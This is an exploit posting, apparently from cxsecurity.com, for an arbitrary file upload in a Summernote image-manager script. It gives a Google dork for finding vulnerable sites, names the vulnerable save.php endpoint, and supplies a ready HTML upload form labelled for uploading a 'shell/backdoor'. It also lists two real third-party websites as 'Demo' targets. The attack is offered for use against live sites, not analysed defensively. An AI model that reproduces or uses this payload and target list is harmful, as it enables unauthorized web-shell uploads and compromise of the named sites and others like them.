Summernote Arbitrary File Upload

2019.01.01
id 0N3R1D3R (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*************************************************** # Exploit Title: Summernote Arbitrary File Upload # Google Dork: "Summernote Image manager by futre" # Exploit: /php/save.php # Vendor: https://summernote.org/ # Date: 01/01/2019 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /php/save.php [+] Upload your shell/backdoor with csrf, post file file <form method="POST" action="http://localhost/summernote/php/save.php"enctype="multipart/form-data"><input type="file" name="file" /><button>upload</button></form> [+] File access will be visible *************************************************** [+] Demo [+] http://staibaktinegarategal.ac.id/public/assets/image-manager/php/save.php [+] http://www.fulviocorsini.it/summernote/php/save.php *************************************************** Thanks To Indonesia To World Team

References:

www.indonesiatoworld.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top